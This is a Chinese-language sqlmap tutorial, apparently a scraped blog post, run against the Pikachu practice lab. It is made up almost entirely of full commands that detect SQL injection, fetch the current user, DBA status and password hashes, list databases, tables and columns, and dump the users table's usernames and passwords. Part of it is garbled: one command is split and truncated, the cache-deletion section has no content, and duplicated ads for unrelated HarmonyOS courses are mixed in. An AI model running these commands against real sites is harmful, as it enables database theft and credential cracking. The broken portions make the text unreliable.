sqlmap基本使用方式（非常详细）零基础入门到精通，收藏这一篇就够了_sqlmap使用教程(1)

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化的资料的朋友，可以戳这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

sqlmap -u “http://192.168.1.168/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --dbms mysql -v 1

• 输入之后sqlmap会自动进行注入，但是会有一些提示，需要我们在终端进行确认，使用–batch参数会自动进行默认操作，不用进行交互信息确定

sqlmap -u “http://192.168.1.168/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --dbms mysql -v 1 --batch

二、获取敏感信息

• 确定存在注入之后，接着通过命令获取敏感信息
• 所需参数
• –current-user：用户连接的用户
• –currnet-db：当前库
• –is-dba：是否root权限
• –passwords：获取数据库的密码 使用这个命令 sqlmap找到密文时，会提示你是否进行hash破解 如果需要选择合适的字典。
• 注入命令

sqlmap -u “http://192.168.1.168/06/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --dbms mysql --current-user --current-db --is-dba --passwords -v 1

三、获取所有库

• 所需参数
• –dbms：指定数据库类型
• –dbs：列出所有数据库
• 注入命令

sqlmap -u “http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” -v 1 --dbms mysql --batch --dbs

四、获取表信息

• 所需参数
• -D：指定库
• –tables：列出所有表
• 注入命令

sqlmap -u “http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --dbms mysql -v 1 -D pikachu --tables

五、获取表的字段

• 所需参数
• -T：指定某个表
• –columns：获取字段
• 注入命令

sqlmap -u “http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --dbms mysql -v 1 -D pikachu -T users --columns

六、获取某个库的所有表的所有字段

• 所需参数
• -tables：枚举指定数据库中的所有表
• –columns：用于枚举指定表中的所有列
• 注入命令

sqlmap -u “http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --dbms mysql -v 1 -D pikachu -tables --columns

七、获取数据

• 所需参数
• –dump：导出数据所有内容
• –dump -C “username,password”：获取字段的内容
• 获取指定库所有表所有字段内容

sqlmap -u “http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --dbms mysql -v 1 -D pikachu -tables --columns --dump

• 获取指定表的所有字段内容

sqlmap -u “http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --dbms mysql -v 1 -D pikachu -T users --columns --dump

• 获取指定表，指定字段内容
• sername,password" --dump

sqlmap -u “http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --dbms mysql -v 1 -D pikachu -T users -C "id,u

八、获取指定条数

• 所需参数
• –count：告诉sqlmap仅执行一个查询来估算表中的行数。通常用于快速判断表是否为空或包含多少条记录。
• –start 1：从第一条记录开始提取数据。
• –stop 3：提取到第三条记录为止。
• 获取总条数

sqlmap -u “http://192.168.1.107/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2” --dbms mysql -v 1 -D pikachu -T users --count

• 获取指定id条数

sqlmap -u “http://192.168.1.107/pikachu/vul/sqli/sqli_str.php name=1&submit=%E6%9F%A5%E8%AF%A2” --dbms mysql -v 1 -D pikachu -T users --dump --start 1 --stop 3

九、删除缓存文件

深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上鸿蒙开发知识点，真正体系化！

由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新

需要这份系统化的资料的朋友，可以戳这里获取

伙伴深入学习提升的进阶课程，涵盖了95%以上鸿蒙开发知识点，真正体系化！**

由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新

需要这份系统化的资料的朋友，可以戳这里获取